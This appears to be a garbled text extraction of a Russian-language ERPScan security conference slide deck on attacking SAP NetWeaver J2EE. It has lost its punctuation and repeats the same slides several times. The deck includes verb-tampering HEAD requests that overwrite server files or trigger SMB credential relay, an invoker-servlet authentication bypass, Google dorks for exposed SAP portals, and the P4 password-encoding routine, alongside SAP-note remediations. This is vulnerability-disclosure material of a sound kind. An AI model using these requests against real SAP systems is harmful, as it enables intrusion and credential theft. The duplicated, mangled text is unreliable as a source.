ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
